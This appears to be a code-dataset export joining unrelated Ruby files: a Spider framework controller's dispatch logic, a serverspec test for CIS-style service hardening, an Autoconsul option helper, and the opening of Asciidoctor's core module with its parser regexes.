# @param [String] action
# @return [Array] A two elements array, containing the method, and additional arguments
def get_action_method(action)
method = nil
additional_arguments = nil
if (action =~ /^([^:]+)(:.+)$/)
method = $1
elsif (action =~ /^([^\/]+)\/(.+)$/) # methods followed by a slash
method = $1
additional_arguments = [$2]
else
method = action
end
method = method[0..-2] if !method.blank? && method[-1].chr == '/'
method, rest = method.split('.', 2) if method
method = self.class.default_action if !method || method.empty?
return nil if method.empty?
return [method.to_sym, additional_arguments]
end
# Returns true if this controller is the final target for the current action, that is, if it does not
# dispatch to any route
# @return [bool] True if the controller is the final target
def action_target?
!@dispatch_next[@call_path] || @dispatch_next[@call_path].dest == self \
|| @dispatch_next[@call_path].dest == self.class
end
# @return [bool] false if the target of the call is a widget, true otherwise
def is_target?
@is_target
end
# If the site supports SSL, returns the #https_url; otherwise, the #http_url
def self.http_s_url(action=nil)
(Spider.site.blank? ? "" : Spider.site.http_s_url) + route_path(action)
end
# Metodo che forza https
def self.https_url(action=nil)
return self.http_s_url(action) if Spider.runmode == 'devel'
Spider.site.https_url + route_path(action)
end
# The main controller's execution method. The Controller will dispatch
# to another controller if a route is set; otherwise, it will call the
# method that should be executed according to action.
#
# This method can be overridden in subclasses, but remember to call super,
# or the dispatch chain will stop!
# @param [String] action The current action
# @param [*Object] arguments Additional action arguments
def execute(action='', *arguments)
return if @__done
debug("Controller #{self} executing #{action} with arguments #{arguments}")
catch(:done) do
if can_dispatch?(:execute, action)
d_next = dispatch_next(action)
#run_chain(:execute, action, *arguments)
# shortcut route to self
return do_dispatch(:execute, action) if d_next.dest != self
arguments = d_next.params
end
if d_next && d_next.dest == self
set_executed_method(d_next.action)
end
if @executed_method
meth = self.method(@executed_method)
args = arguments + @executed_method_arguments
@current_action = action
arity = meth.arity
unless arity == -1
arity = (-arity + 1) if arity < 0
args = arity == 0 ? [] : args[0..(arity-1)]
args = [nil] if meth.arity == 1 && args.empty?
end
Spider.logger.info("Executing: #{self.class.name}##{@executed_method}.#{@request.format}")
spider_main_controller_send = true
send(@executed_method, *args)
else
raise NotFound.new(action)
end
end
end
# Helper method, that calls and propagates #before
# @param [String] action The current action
# @param [*Object] arguments Additional action arguments
def call_before(action='', *arguments)
return if respond_to?(:serving_static?) && self.serving_static?
@call_path = action
before(action, *arguments)
catch(:done) do
#debug("#{self} before")
d_next = dispatch_next(action)
unless d_next && d_next.obj == self
do_dispatch(:call_before, action, *arguments)
end
end
end
# This method can be implemented by Controllers, and will be called
# on the controller chain before the execute method.
#
# This method is usually reserved for preprocessing that does not
# output to the browser, to allow other controllers in chain to set response
# headers.
# @param [String] action The current action
# @param [*Object] arguments Additional action arguments
def before(action='', *arguments)
end
# Helper method, that calls and propagates #after
# @param [String] action The current action
# @param [*Object] arguments Additional action arguments
def call_after(action='', *arguments)
return if respond_to?(:serving_static?) && self.serving_static?
after(action, *arguments)
catch(:done) do
d_next = dispatch_next(action)
unless d_next && d_next.obj == self
do_dispatch(:call_after, action, *arguments)
end
end
end
# This method can be implemented by Controllers, and will be called
# on the controller chain after the execute method.
#
# If the webserver supports it, this method will be called after the response
# has been returned to the browser; so, it's suitable for post processing.
# If you aren't using a threaded web server, though, keep in mind that the
# process won't be available to service other requests.
# @param [String] action The current action
# @param [*Object] arguments Additional action arguments
def after(action='', *arguments)
end
# @return [bool] True if the controller is done, and should not continue dispatching.
def done?
@__done
end
# Stops the execution of the controller chain
# @return [void]
def done
self.done = true
throw :done
end
# Sets the controller chain's "done" state
# @param [bool] val
# @return [void]
def done=(val)
@__done = val
@dispatch_previous.done = val if @dispatch_previous
end
# Checks if an action responds to given route conditions. Is called by
# {Dispatcher#do_dispatch}.
# The default implementation calls Controller.check_action, which in turn is mixed in
# from {Dispatcher::ClassMethods#check_action}
# @param [String] action
# @param [Array] c An array of route conditions
# @return [bool]
def check_action(action, c)
self.class.check_action(action, c)
end
# Returns a new Scene instance for use in the controller.
# @param [Hash] scene Hash to construct the scene from
# @return [Scene]
def get_scene(scene=nil)
scene = Scene.new(scene) if scene.class == Hash
scene ||= Scene.new
return scene
end
# Sets controller information on a scene
# @param [Scene] scene
# @return [Scene]
def prepare_scene(scene)
req_path = @request.path
req_path += 'index' if !req_path.blank? && req_path[-1].chr == '/'
scene.request = {
:path => @request.path,
:page_path => req_path
}
scene.controller = {
:request_path => request_path,
:class => self.class
}
scene.content = {}
return scene
end
# See {Controller.controller_action?}
# @return [bool] True if the method is a controller action for the class
def controller_action?(method)
self.class.controller_action?(method)
end
protected
# Instantiates an object dispatched by a route
# @param [Route]
# @return [Controller]
def dispatched_object(route)
klass = route.dest
if klass.class != Class
if klass == self # route to self
set_executed_method(route.action)
end
return klass
elsif klass == self.class
self.set_action(route.action)
return self
end
obj = klass.new(@request, @response, @scene)
obj.dispatch_action = route.matched || ''
# FIXME: this is not clean
obj.set_action(route.action)
# obj.dispatch_path = @dispatch_path + route.path
return obj
end
# Given an action, sets the executed method unless it can be dispatched
# @param [String] action
# @return [Symbol|nil] The executed method, if it was set, or nil
def set_action(action)
@executed_method = nil
@executed_method_arguments = nil
if !can_dispatch?(:execute, action)
return set_executed_method(action)
end
nil
end
# Given an action, sets executed_method and executed_method_arguments
# @param [String] action
# @return [Symbol] The executed_method
def set_executed_method(action)
method, additional_arguments = get_action_method(action)
if method && controller_action?(method)
@executed_method = method.to_sym
@executed_method_arguments = additional_arguments || []
end
return @executed_method
end
# This method can be overrided by subclasses, to provide custom handling of
# exceptions
# @param [Exception]
# @return [void]
def try_rescue(exc)
raise exc
end
private
# Overrides {Dispatcher#get_route}, setting the action for nil routes
# @param [String] path
def get_route(*args)
route = super
return route unless route
action = route.path.split('/').first
action_method, action_params = get_action_method(action)
if route.nil_route && !action.blank? && self.respond_to?(action_method)
route.action = action
end
route
end
end
end
require 'spiderfw/widget/widget'
require 'spiderfw/tag/tag'
| 39.994012 | 110 | 0.554025 |
39c189ef8e8690ee133493c6e9913b0bc6ba463b | 3,324 | require 'spec_helper_acceptance'
# Ensure time synchronization is in use - Section 2.2.1.1
describe package('ntp') do
it { should be_installed }
end
describe package('chrony') do
it { should be_installed }
end
# Ensure ntp is configured - Section 2.2.1.2
describe file('/etc/ntp.conf') do
it { should be_file }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
it { should be_mode 644 }
end
describe file('/etc/sysconfig/ntpd') do
it { should be_file }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
it { should be_mode 644 }
end
describe file('/usr/lib/systemd/system/ntpd.service') do
it { should be_file }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
it { should be_mode 644 }
its(:content) { should match /ExecStart=\/usr\/sbin\/ntpd -u ntp:ntp $OPTIONS/ }
end
# Ensure Chrony is configured - Section 2.2.1.3
describe file('/etc/chrony.conf') do
it { should be_file }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
it { should be_mode 644 }
end
describe file('/etc/sysconfig/chronyd') do
it { should be_file }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
it { should be_mode 644 }
its(:content) { should match /OPTIONS="-u chrony"/ }
end
# Ensure X Window System is not installed - Section 2.2.2
describe package('xorg-x11-server-Xorg') do
it { should_not be_installed }
end
# Ensure Avahi Server is not enabled - Section 2.2.3
describe service('avahi-daemon') do
it { should_not be_running }
end
# Ensure CUPS is not enabled - Section 2.2.4
describe service('cups') do
it { should_not be_running }
end
# Ensure DHCP Server is not enabled - Section 2.2.5
describe service('dhcpd') do
it { should_not running }
end
# Ensure LDAP Server is not enabled - Section 2.2.6
describe service('slapd') do
it { should_not be_running }
end
# Ensure NFS and RPC are not enabled - Section 2.2.7
describe service('nfs') do
it { should_not be_running }
end
describe service('nfs-server') do
it { should_not be_running }
end
describe service('rpcbind') do
it { should_not be_running }
end
# Ensure DNS Server is not enabled - Section 2.2.8
describe service('named') do
it { should_not be_running }
end
# Ensure FTP Server is not enabled - Section 2.2.9
describe package('vsftpd') do
it { should_not be_running }
end
# Ensure HTTP Server is not enabled - Section 2.2.10
describe service('httpd') do
it { should_not be_running }
end
# Ensure IMAP and POP3 Server are not enabled - Section 2.2.11
describe service('dovecot') do
it { should_not be_running }
end
# Ensure Samba is not enabled - Section 2.2.12
describe service('smb') do
it { should_not be_running }
end
# Ensure HTTP Proxy Server is not enabled - Section 2.2.13
describe service('squid') do
it { should_not be_running }
end
# Ensure SNMP Server is not enabled - Section 2.2.14
describe service('snmpd') do
it { should_not be_running }
end
# Ensure MTA is configured for local-only mode - Section 2.2.15
describe file('/etc/postfix/main.cf') do
it { should be_file }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
it { should be_mode 644}
end | 25.569231 | 84 | 0.692238 |
e808fbe7168eec68188405770cd7c236bae0d4a0 | 317 | module Autoconsul
module Helpers
def self.options(spec)
# This will convert a hash of format { 'option' => 'option_value' }
# into a string with the expected format for command line:
# --option --option_value
spec.reduce(String.new) { |r, (o, v)| r << "--#{o} #{v} " }
end
end
end
| 28.818182 | 73 | 0.602524 |
380309c17cee3ca7a26b4f2b2ccf8be2ced458f8 | 55,160 | # frozen_string_literal: true
require 'set'
# NOTE RUBY_ENGINE == 'opal' conditional blocks like this are filtered by the Opal preprocessor
if RUBY_ENGINE == 'opal'
# this require is satisfied by the Asciidoctor.js build; it augments the Ruby environment for Asciidoctor.js
require 'asciidoctor/js'
else
autoload :Base64, 'base64'
require 'cgi/util'
autoload :OpenURI, 'open-uri'
autoload :Pathname, 'pathname'
autoload :StringScanner, 'strscan'
autoload :URI, 'uri'
end
# Public: Methods for parsing AsciiDoc input files and converting documents
# using eRuby templates.
#
# AsciiDoc documents comprise a header followed by zero or more sections.
# Sections are composed of blocks of content. For example:
#
# = Doc Title
#
# == Section 1
#
# This is a paragraph block in the first section.
#
# == Section 2
#
# This section has a paragraph block and an olist block.
#
# . Item 1
# . Item 2
#
# Examples:
#
# Use built-in converter:
#
# Asciidoctor.convert_file 'sample.adoc'
#
# Use custom (Tilt-supported) templates:
#
# Asciidoctor.convert_file 'sample.adoc', template_dir: 'path/to/templates'
#
module Asciidoctor
# alias the RUBY_ENGINE constant inside the Asciidoctor namespace and define a precomputed alias for runtime
RUBY_ENGINE_OPAL = (RUBY_ENGINE = ::RUBY_ENGINE) == 'opal'
module SafeMode
# A safe mode level that disables any of the security features enforced
# by Asciidoctor (Ruby is still subject to its own restrictions).
UNSAFE = 0;
# A safe mode level that closely parallels safe mode in AsciiDoc. This value
# prevents access to files which reside outside of the parent directory of
# the source file and disables any macro other than the include::[] directive.
SAFE = 1;
# A safe mode level that disallows the document from setting attributes
# that would affect the conversion of the document, in addition to all the
# security features of SafeMode::SAFE. For instance, this level forbids
# changing the backend or source-highlighter using an attribute defined
# in the source document header. This is the most fundamental level of
# security for server deployments (hence the name).
SERVER = 10;
# A safe mode level that disallows the document from attempting to read
# files from the file system and including the contents of them into the
# document, in additional to all the security features of SafeMode::SERVER.
# For instance, this level disallows use of the include::[] directive and the
# embedding of binary content (data uri), stylesheets and JavaScripts
# referenced by the document.(Asciidoctor and trusted extensions may still
# be allowed to embed trusted content into the document).
#
# Since Asciidoctor is aiming for wide adoption, this level is the default
# and is recommended for server deployments.
SECURE = 20;
# A planned safe mode level that disallows the use of passthrough macros and
# prevents the document from setting any known attributes, in addition to all
# the security features of SafeMode::SECURE.
#
# Please note that this level is not currently implemented (and therefore not
# enforced)!
#PARANOID = 100;
@names_by_value = {}.tap {|accum| (constants false).each {|sym| accum[const_get sym, false] = sym.to_s.downcase } }
def self.value_for_name name
const_get name.upcase, false
end
def self.name_for_value value
@names_by_value[value]
end
def self.names
@names_by_value.values
end
end
# Flags to control compliance with the behavior of AsciiDoc
module Compliance
@keys = ::Set.new
class << self
attr_reader :keys
# Defines a new compliance key and assigns an initial value.
def define key, value
instance_variable_set %(@#{key}), value
singleton_class.send :attr_accessor, key
@keys << key
nil
end
end
# AsciiDoc terminates paragraphs adjacent to
# block content (delimiter or block attribute list)
# This option allows this behavior to be modified
# TODO what about literal paragraph?
# Compliance value: true
define :block_terminates_paragraph, true
# AsciiDoc does not parse paragraphs with a verbatim style
# (i.e., literal, listing, source, verse) as verbatim content.
# This options allows this behavior to be modified
# Compliance value: false
define :strict_verbatim_paragraphs, true
# AsciiDoc supports both atx (single-line) and setext (underlined) section titles.
# This option can be used to disable the setext variant.
# Compliance value: true
define :underline_style_section_titles, true
# Asciidoctor will unwrap the content in a preamble
# if the document has a title and no sections.
# Compliance value: false
define :unwrap_standalone_preamble, true
# AsciiDoc drops lines that contain references to missing attributes.
# This behavior is not intuitive to most writers
# Compliance value: 'drop-line'
define :attribute_missing, 'skip'
# AsciiDoc drops lines that contain an attribute unassignemnt.
# This behavior may need to be tuned depending on the circumstances.
# Compliance value: 'drop-line'
define :attribute_undefined, 'drop-line'
# Asciidoctor will allow the id, role and options to be set
# on blocks using a shorthand syntax (e.g., #idname.rolename%optionname)
# Compliance value: false
define :shorthand_property_syntax, true
# Asciidoctor will attempt to resolve the target of a cross reference by
# matching its reference text (reftext or title) (e.g., <<Section Title>>)
# Compliance value: false
define :natural_xrefs, true
# Asciidoctor will start counting at the following number
# when creating a unique id when there is a conflict
# Compliance value: 2
define :unique_id_start_index, 2
# Asciidoctor will recognize commonly-used Markdown syntax
# to the degree it does not interfere with existing
# AsciiDoc syntax and behavior.
# Compliance value: false
define :markdown_syntax, true
end
# The absolute root directory of the Asciidoctor RubyGem
ROOT_DIR = ::File.dirname ::File.absolute_path __dir__ unless defined? ROOT_DIR
# The absolute lib directory of the Asciidoctor RubyGem
LIB_DIR = ::File.join ROOT_DIR, 'lib'
# The absolute data directory of the Asciidoctor RubyGem
DATA_DIR = ::File.join ROOT_DIR, 'data'
# The user's home directory, as best we can determine it
USER_HOME = ::Dir.home
# The newline character used for output; stored in constant table as an optimization
LF = ?\n
# The null character to use for splitting attribute values
NULL = ?\0
# String for matching tab character
TAB = ?\t
# Maximum integer value for "boundless" operations; equal to MAX_SAFE_INTEGER in JavaScript
MAX_INT = 9007199254740991
# Alias UTF_8 encoding for convenience / speed
UTF_8 = ::Encoding::UTF_8
# Byte arrays for UTF-* Byte Order Marks
BOM_BYTES_UTF_8 = [0xef, 0xbb, 0xbf]
BOM_BYTES_UTF_16LE = [0xff, 0xfe]
BOM_BYTES_UTF_16BE = [0xfe, 0xff]
# The mode to use when opening a file for reading
FILE_READ_MODE = RUBY_ENGINE_OPAL ? 'r' : 'rb:utf-8:utf-8'
# The mode to use when opening a URI for reading
URI_READ_MODE = FILE_READ_MODE
# The mode to use when opening a file for writing
FILE_WRITE_MODE = RUBY_ENGINE_OPAL ? 'w' : 'w:utf-8'
# The default document type
# Can influence markup generated by the converters
DEFAULT_DOCTYPE = 'article'
# The backend determines the format of the converted output, default to html5
DEFAULT_BACKEND = 'html5'
DEFAULT_STYLESHEET_KEYS = ['', 'DEFAULT'].to_set
DEFAULT_STYLESHEET_NAME = 'asciidoctor.css'
# Pointers to the preferred version for a given backend.
BACKEND_ALIASES = {
'html' => 'html5',
'docbook' => 'docbook5'
}
# Default page widths for calculating absolute widths
DEFAULT_PAGE_WIDTHS = {
'docbook' => 425
}
# Default extensions for the respective base backends
DEFAULT_EXTENSIONS = {
'html' => '.html',
'docbook' => '.xml',
'pdf' => '.pdf',
'epub' => '.epub',
'manpage' => '.man',
'asciidoc' => '.adoc'
}
# Set of file extensions recognized as AsciiDoc documents (stored as a truth hash)
ASCIIDOC_EXTENSIONS = {
'.adoc' => true,
'.asciidoc' => true,
'.asc' => true,
'.ad' => true,
# TODO .txt should be deprecated
'.txt' => true
}
SETEXT_SECTION_LEVELS = {
'=' => 0,
'-' => 1,
'~' => 2,
'^' => 3,
'+' => 4
}
ADMONITION_STYLES = ['NOTE', 'TIP', 'IMPORTANT', 'WARNING', 'CAUTION'].to_set
ADMONITION_STYLE_HEADS = ['N', 'T', 'I', 'W', 'C'].to_set
PARAGRAPH_STYLES = ['comment', 'example', 'literal', 'listing', 'normal', 'open', 'pass', 'quote', 'sidebar', 'source', 'verse', 'abstract', 'partintro'].to_set
VERBATIM_STYLES = ['literal', 'listing', 'source', 'verse'].to_set
DELIMITED_BLOCKS = {
'--' => [:open, ['comment', 'example', 'literal', 'listing', 'pass', 'quote', 'sidebar', 'source', 'verse', 'admonition', 'abstract', 'partintro'].to_set],
'----' => [:listing, ['literal', 'source'].to_set],
'....' => [:literal, ['listing', 'source'].to_set],
'====' => [:example, ['admonition'].to_set],
'****' => [:sidebar, ::Set.new],
'____' => [:quote, ['verse'].to_set],
'++++' => [:pass, ['stem', 'latexmath', 'asciimath'].to_set],
'|===' => [:table, ::Set.new],
',===' => [:table, ::Set.new],
':===' => [:table, ::Set.new],
'!===' => [:table, ::Set.new],
'////' => [:comment, ::Set.new],
'```' => [:fenced_code, ::Set.new]
}
DELIMITED_BLOCK_HEADS = {}.tap {|accum| DELIMITED_BLOCKS.each_key {|k| accum[k.slice 0, 2] = true } }
DELIMITED_BLOCK_TAILS = {}.tap {|accum| DELIMITED_BLOCKS.each_key {|k| accum[k] = k[k.length - 1] if k.length == 4 } }
LAYOUT_BREAK_CHARS = {
'\'' => :thematic_break,
'<' => :page_break
}
MARKDOWN_THEMATIC_BREAK_CHARS = {
'-' => :thematic_break,
'*' => :thematic_break,
'_' => :thematic_break
}
HYBRID_LAYOUT_BREAK_CHARS = LAYOUT_BREAK_CHARS.merge MARKDOWN_THEMATIC_BREAK_CHARS
#LIST_CONTEXTS = [:ulist, :olist, :dlist, :colist]
NESTABLE_LIST_CONTEXTS = [:ulist, :olist, :dlist]
# TODO validate use of explicit style name above ordered list (this list is for selecting an implicit style)
ORDERED_LIST_STYLES = [:arabic, :loweralpha, :lowerroman, :upperalpha, :upperroman] #, :lowergreek]
ORDERED_LIST_KEYWORDS = {
#'arabic' => '1',
#'decimal' => '1',
'loweralpha' => 'a',
'lowerroman' => 'i',
#'lowergreek' => 'a',
'upperalpha' => 'A',
'upperroman' => 'I'
}
ATTR_REF_HEAD = '{'
LIST_CONTINUATION = '+'
# NOTE AsciiDoc Python allows + to be preceded by TAB; Asciidoctor does not
HARD_LINE_BREAK = ' +'
LINE_CONTINUATION = ' \\'
LINE_CONTINUATION_LEGACY = ' +'
BLOCK_MATH_DELIMITERS = {
asciimath: ['\$', '\$'],
latexmath: ['\[', '\]'],
}
INLINE_MATH_DELIMITERS = {
asciimath: ['\$', '\$'],
latexmath: ['\(', '\)'],
}
(STEM_TYPE_ALIASES = {
'latexmath' => 'latexmath',
'latex' => 'latexmath',
'tex' => 'latexmath'
}).default = 'asciimath'
FONT_AWESOME_VERSION = '4.7.0'
HIGHLIGHT_JS_VERSION = '9.15.6'
MATHJAX_VERSION = '2.7.5'
# attributes which be changed within the content of the document (but not
# header) because it has semantic meaning; ex. sectnums
FLEXIBLE_ATTRIBUTES = ['sectnums']
# A collection of regular expressions used by the parser.
#
# NOTE The following pattern, which appears frequently, captures the
# contents between square brackets, ignoring escaped closing brackets
# (closing brackets prefixed with a backslash '\' character)
#
# Pattern: \[(|#{CC_ALL}*?[^\\])\]
# Matches: [enclosed text] and [enclosed [text\]], not [enclosed text \\] or [\\] (as these require a trailing space)
#
# NOTE \w only matches ASCII word characters, whereas [[:word:]] or \p{Word} matches any character in the Unicode word category.
#(pseudo)module Rx
## Regular expression character classes (to ensure regexp compatibility between Ruby and JavaScript)
## CC stands for "character class", CG stands for "character class group"
unless RUBY_ENGINE == 'opal'
# CC_ALL is any character, including newlines (must be accompanied by multiline regexp flag)
CC_ALL = '.'
# CC_ANY is any character except newlines
CC_ANY = '.'
CC_EOL = '$'
CC_ALPHA = CG_ALPHA = '\p{Alpha}'
CC_ALNUM = CG_ALNUM = '\p{Alnum}'
CG_BLANK = '\p{Blank}'
CC_WORD = CG_WORD = '\p{Word}'
end
## Document header
# Matches the author info line immediately following the document title.
#
# Examples
#
# Doc Writer <[email protected]>
# Mary_Sue Brontë
#
AuthorInfoLineRx = /^(#{CG_WORD}[#{CC_WORD}\-'.]*)(?: +(#{CG_WORD}[#{CC_WORD}\-'.]*))?(?: +(#{CG_WORD}[#{CC_WORD}\-'.]*))?(?: +<([^>]+)>)?$/
# Matches the revision info line, which appears immediately following
# the author info line beneath the document title.
#
# Examples
#
# v1.0
# 2013-01-01
# v1.0, 2013-01-01: Ring in the new year release
# 1.0, Jan 01, 2013
#
RevisionInfoLineRx = /^(?:[^\d{]*(#{CC_ANY}*?),)? *(?!:)(#{CC_ANY}*?)(?: *(?!^),?: *(#{CC_ANY}*))?$/
# Matches the title and volnum in the manpage doctype.
#
# Examples
#
# = asciidoctor(1)
# = asciidoctor ( 1 )
#
ManpageTitleVolnumRx = /^(#{CC_ANY}+?) *\( *(#{CC_ANY}+?) *\)$/
# Matches the name and purpose in the manpage doctype.
#
# Examples
#
# asciidoctor - converts AsciiDoc source files to HTML, DocBook and other formats
#
ManpageNamePurposeRx = /^(#{CC_ANY}+?) +- +(#{CC_ANY}+)$/
## Preprocessor directives
# Matches a conditional preprocessor directive (e.g., ifdef, ifndef, ifeval and endif).
#
# Examples
#
# ifdef::basebackend-html[]
# ifndef::theme[]
# ifeval::["{asciidoctor-version}" >= "0.1.0"]
# ifdef::asciidoctor[Asciidoctor!]
# endif::theme[]
# endif::basebackend-html[]
# endif::[]
#
ConditionalDirectiveRx = /^(\\)?(ifdef|ifndef|ifeval|endif)::(\S*?(?:([,+])\S*?)?)\[(#{CC_ANY}+)?\]$/
# Matches a restricted (read as safe) eval expression.
#
# Examples
#
# "{asciidoctor-version}" >= "0.1.0"
#
EvalExpressionRx = /^(#{CC_ANY}+?) *([=!><]=|[><]) *(#{CC_ANY}+)$/
# Matches an include preprocessor directive.
#
# Examples
#
# include::chapter1.ad[]
# include::example.txt[lines=1;2;5..10]
#
IncludeDirectiveRx = /^(\\)?include::([^\[][^\[]*)\[(#{CC_ANY}+)?\]$/
# Matches a trailing tag directive in an include file.
#
# Examples
#
# // tag::try-catch[]
# try {
# someMethod();
# catch (Exception e) {
# log(e);
# }
# // end::try-catch[]
# NOTE m flag is required for Asciidoctor.js
TagDirectiveRx = /\b(?:tag|(e)nd)::(\S+?)\[\](?=$|[ \r])/m
## Attribute entries and references
# Matches a document attribute entry.
#
# Examples
#
# :foo: bar
# :First Name: Dan
# :sectnums!:
# :!toc:
# :long-entry: Attribute value lines ending in ' \' \
# are joined together as a single value, \
# collapsing the line breaks and indentation to \
# a single space.
#
AttributeEntryRx = /^:(!?#{CG_WORD}[^:]*):(?:[ \t]+(#{CC_ANY}*))?$/
# Matches invalid characters in an attribute name.
InvalidAttributeNameCharsRx = /[^-#{CC_WORD}]/
# Matches a pass inline macro that surrounds the value of an attribute
# entry once it has been parsed.
#
# Examples
#
# pass:[text]
# pass:a[{a} {b} {c}]
#
if RUBY_ENGINE == 'opal'
# NOTE In JavaScript, ^ and $ match the boundaries of the string when the m flag is not set
AttributeEntryPassMacroRx = /^pass:([a-z]+(?:,[a-z]+)*)?\[(#{CC_ALL}*)\]$/
else
AttributeEntryPassMacroRx = /\Apass:([a-z]+(?:,[a-z]+)*)?\[(.*)\]\Z/m
end
# Matches an inline attribute reference.
#
# Examples
#
# {foobar} or {app_name} or {product-version}
# {counter:sequence-name:1}
# {set:foo:bar}
# {set:name!}
#
AttributeReferenceRx = /(\\)?\{(#{CG_WORD}[-#{CC_WORD}]*|(set|counter2?):#{CC_ANY}+?)(\\)?\}/
## Paragraphs and delimited blocks
# Matches an anchor (i.e., id + optional reference text) on a line above a block.
#
# Examples
#
# [[idname]]
# [[idname,Reference Text]]
#
BlockAnchorRx = /^\[\[(?:|([#{CC_ALPHA}_:][#{CC_WORD}:.-]*)(?:, *(#{CC_ANY}+))?)\]\]$/
# Matches an attribute list above a block element.
#
# Examples
#
# # strictly positional
# [quote, Adam Smith, Wealth of Nations]
#
# # name/value pairs
# [NOTE, caption="Good to know"]
#
# # as attribute reference
# [{lead}]
#
BlockAttributeListRx = /^\[(|[#{CC_WORD}.#%{,"']#{CC_ANY}*)\]$/
# A combined pattern that matches either a block anchor or a block attribute list.
#
# TODO this one gets hit a lot, should be optimized as much as possible
BlockAttributeLineRx = /^\[(?:|[#{CC_WORD}.#%{,"']#{CC_ANY}*|\[(?:|[#{CC_ALPHA}_:][#{CC_WORD}:.-]*(?:, *#{CC_ANY}+)?)\])\]$/
# Matches a title above a block.
#
# Examples
#
# .Title goes here
#
BlockTitleRx = /^\.(\.?[^ \t.]#{CC_ANY}*)$/
# Matches an admonition label at the start of a paragraph.
#
# Examples
#
# NOTE: Just a little note.
# TIP: Don't forget!
#
AdmonitionParagraphRx = /^(#{ADMONITION_STYLES.to_a.join '|'}):[ \t]+/
# Matches a literal paragraph, which is a line of text preceded by at least one space.
#
# Examples
#
# <SPACE>Foo
# <TAB>Foo
LiteralParagraphRx = /^([ \t]+#{CC_ANY}*)$/
# Matches a comment block.
#
# Examples
#
# ////
# This is a block comment.
# It can span one or more lines.
# ////
#CommentBlockRx = %r(^/{4,}$)
# Matches a comment line.
#
# Examples
#
# // note to author
#
#CommentLineRx = %r(^//(?=[^/]|$))
## Section titles
# Matches an Atx (single-line) section title.
#
# Examples
#
# == Foo
# // ^ a level 1 (h2) section title
#
# == Foo ==
# // ^ also a level 1 (h2) section title
#
AtxSectionTitleRx = /^(=={0,5})[ \t]+(#{CC_ANY}+?)(?:[ \t]+\1)?$/
# Matches an extended Atx section title that includes support for the Markdown variant.
ExtAtxSectionTitleRx = /^(=={0,5}|#\#{0,5})[ \t]+(#{CC_ANY}+?)(?:[ \t]+\1)?$/
# Matches the title only (first line) of an Setext (two-line) section title.
# The title cannot begin with a dot and must have at least one alphanumeric character.
SetextSectionTitleRx = /^((?!\.)#{CC_ANY}*?#{CG_ALNUM}#{CC_ANY}*)$/
# Matches an anchor (i.e., id + optional reference text) inside a section title.
#
# Examples
#
# Section Title [[idname]]
# Section Title [[idname,Reference Text]]
#
InlineSectionAnchorRx = / (\\)?\[\[([#{CC_ALPHA}_:][#{CC_WORD}:.-]*)(?:, *(#{CC_ANY}+))?\]\]$/
# Matches invalid ID characters in a section title.
#
# NOTE uppercase chars not included since expression is only run on a lowercase string
InvalidSectionIdCharsRx = /<[^>]+>|&(?:[a-z][a-z]+\d{0,2}|#\d\d\d{0,4}|#x[\da-f][\da-f][\da-f]{0,3});|[^ #{CC_WORD}\-.]+?/
# Matches an explicit section level style like sect1
#
SectionLevelStyleRx = /^sect\d$/
## Lists
# Detects the start of any list item.
#
# NOTE we only have to check as far as the blank character because we know it means non-whitespace follows.
# IMPORTANT if this regexp does not agree with the regexp for each list type, the parser will hang.
AnyListRx = %r(^(?:[ \t]*(?:-|\*\**|\.\.*|\u2022|\d+\.|[a-zA-Z]\.|[IVXivx]+\))[ \t]|(?!//[^/])[ \t]*[^ \t]#{CC_ANY}*?(?::::{0,2}|;;)(?:$|[ \t])|<?\d+>[ \t]))
# Matches an unordered list item (one level for hyphens, up to 5 levels for asterisks).
#
# Examples
#
# * Foo
# - Foo
#
# NOTE we know trailing (.*) will match at least one character because we strip trailing spaces
UnorderedListRx = /^[ \t]*(-|\*\**|\u2022)[ \t]+(#{CC_ANY}*)$/
# Matches an ordered list item (explicit numbering or up to 5 consecutive dots).
#
# Examples
#
# . Foo
# .. Foo
# 1. Foo (arabic, default)
# a. Foo (loweralpha)
# A. Foo (upperalpha)
# i. Foo (lowerroman)
# I. Foo (upperroman)
#
# NOTE leading space match is not always necessary, but is used for list reader
# NOTE we know trailing (.*) will match at least one character because we strip trailing spaces
OrderedListRx = /^[ \t]*(\.\.*|\d+\.|[a-zA-Z]\.|[IVXivx]+\))[ \t]+(#{CC_ANY}*)$/
# Matches the ordinals for each type of ordered list.
OrderedListMarkerRxMap = {
arabic: /\d+\./,
loweralpha: /[a-z]\./,
lowerroman: /[ivx]+\)/,
upperalpha: /[A-Z]\./,
upperroman: /[IVX]+\)/,
#lowergreek: /[a-z]\]/,
}
# Matches a description list entry.
#
# Examples
#
# foo::
# bar:::
# baz::::
# blah;;
#
# # the term may be followed by a description on the same line...
#
# foo:: The metasyntactic variable that commonly accompanies 'bar' (see also, <<bar>>).
#
# # ...or on a separate line, which may optionally be indented
#
# foo::
# The metasyntactic variable that commonly accompanies 'bar' (see also, <<bar>>).
#
# # attribute references may be used in both the term and the description
#
# {foo-term}:: {foo-desc}
#
# NOTE we know trailing (.*) will match at least one character because we strip trailing spaces
# NOTE must skip line comment when looking for next list item inside list
DescriptionListRx = %r(^(?!//[^/])[ \t]*([^ \t]#{CC_ANY}*?)(:::{0,2}|;;)(?:$|[ \t]+(#{CC_ANY}*)$))
# Matches a sibling description list item (excluding the delimiter specified by the key).
# NOTE must skip line comment when looking for sibling list item
DescriptionListSiblingRx = {
'::' => %r(^(?!//[^/])[ \t]*([^ \t]#{CC_ANY}*?[^:]|[^ \t:])(::)(?:$|[ \t]+(#{CC_ANY}*)$)),
':::' => %r(^(?!//[^/])[ \t]*([^ \t]#{CC_ANY}*?[^:]|[^ \t:])(:::)(?:$|[ \t]+(#{CC_ANY}*)$)),
'::::' => %r(^(?!//[^/])[ \t]*([^ \t]#{CC_ANY}*?[^:]|[^ \t:])(::::)(?:$|[ \t]+(#{CC_ANY}*)$)),
';;' => %r(^(?!//[^/])[ \t]*([^ \t]#{CC_ANY}*?)(;;)(?:$|[ \t]+(#{CC_ANY}*)$))
}
# Matches a callout list item.
#
# Examples
#
# <1> Explanation
#
# or
#
# <.> Explanation with automatic number
#
# NOTE we know trailing (.*) will match at least one character because we strip trailing spaces
CalloutListRx = /^<(\d+|\.)>[ \t]+(#{CC_ANY}*)$/
# Matches a callout reference inside literal text.
#
# Examples
# <1> (optionally prefixed by //, #, -- or ;; line comment chars)
